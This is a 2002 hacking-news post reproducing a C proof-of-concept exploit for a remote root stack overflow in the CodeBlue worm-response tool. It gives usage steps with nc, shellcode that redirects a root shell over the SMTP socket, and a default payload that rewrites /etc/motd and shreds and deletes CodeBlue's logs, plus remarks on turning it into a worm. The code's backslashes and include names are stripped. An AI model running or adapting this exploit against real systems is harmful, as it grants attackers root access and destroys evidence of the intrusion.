Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » Demonstration linux-x86 remote root against codeblue v1.1

Demonstration linux-x86 remote root against codeblue v1.1

by Nikola Strahija on February 18th, 2002 Otherwise it's known as CodeBlue v4. This is a rather trivial to exploit...


* From get_smtp_reply()
*
* "We'll loop infinately, receiving
* 1 byte at a time until we receive a carriage return
* or line-feed character, signifying the end of the output"
*
* The stack looks like
*
* int get_smtp_reply(int sd)
* {
* char response[1024];
* char reply_message[1024];
* ...
* I probably don't have to mention it, but it reads the response into
response.
* ...
*
* Also, since this is meant to increase security a little, why doesn't it
* filter non-alphanumeric chars? Also, since it is playing with untrusted
* data, why doesn't it drop uids, instead of insisting as running as root?
*
* if ((userid = getuid()) != 0) {
* fprintf(stderr, "uid %d is invalid!n", userid);
* fprintf(stderr, "This program MUST be run as rootn");
* exit(1);
* }
*
* Usage: gcc exp.c -o exp; ./exp | nc -l -p 25
* Now you could do (one another terminal)
* printf "GET /default.ida?NNNNNN HTTP/1.0nn" | nc remotehost 80
* and wait until codeblue runs.
*
* Granted, nc makes it remote, but why reinvent the wheel?
*
* Oh, and by the way, you'll most likely have to change the offset down there.
* Lots of improvements could (well, have) be done, such as a select(), read(),
* write(), so you can get a remote terminal... at the moment, all it'll do
* is make the id command display. Brute force is interesting, because you
* have to wait until it's run. I suspect, though I haven't tried, you could
* almost double the nop size by playing around with reply_message.
*
* If you had a sense of humour, you probably could turn this into a worm. This
* is one of the reason I don't really like automated response/attack software.
* Or you could just trojan/modify your existing smtp do to this whenever it
* recieves a HELO localhost...
*
* The interesting part of this is the bug in codeblue helped me win
* a wargame. We where given root an a box in a lan, and got to penertrate
* several others. Since the person running it was sick of being scanned by
* the various worms, he was running this....
*
* Now for the paranoia part, how many of those scans have you recieved where
* to check if you where running CodeBlue?
*
* laters,
* -- Andrew Griffiths
*/



#include
#include
#include
#include
#include
#include

/* The shellcode beats doing a bindshell/connect code, since codeblue already
is
* talking to our (supposed) smtp server, so all we have to do is redirect
* stdin/out/err to fd 5. (Assuming fd 5 is the smtp connection. It was on
* mine.)
*/

unsigned char sc[] =
/* dupsh basically, dup2(5, (0,1,2)) */
"x31xc0x89xc3x89xc1x89xc2xb2x3fx88xd0xb3x05"
"xcdx80x89xd0x41xcdx80x89xd0x41xcdx80"
/* Standard aleph1 shellcode */
"xebx1dx5ex29xc0x88x46x07x89x46x0c"
"x89x76x08xb0x0bx87xf3x8dx4bx08"
"x8dx53x0cxcdx80x29xc0x40xcdx80"
"xe8xdexffxffxff/bin/sh";


int main()
{
unsigned char buf[3000];

memset(buf, 0, 3000);

memset(buf, 0x90, 967);
strncpy(buf+967, sc, strlen(sc));
fprintf(stderr, "buf: %sn", buf);
fprintf(stderr, "strlen(buf): %dn", strlen(buf));
buf[1036] = 0xd0;
buf[1037] = 0xdf;
buf[1038] = 0xff;
buf[1039] = 0xbf;
#ifdef ICANMODIFYCCODEORMODIFYCOMPILETIMEFLAGS
strcpy(buf + 1040, " id");
#else
strcpy(buf + 1040, " echo warning codeblue has a remote root hole in it
>/etc/motd; shred -z codeblue*log* 2>/dev/null; rm -f codeblue*log*
2>/dev/null; echo you sux. RTFC...");
#endif
printf("%s", buf);
}


Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »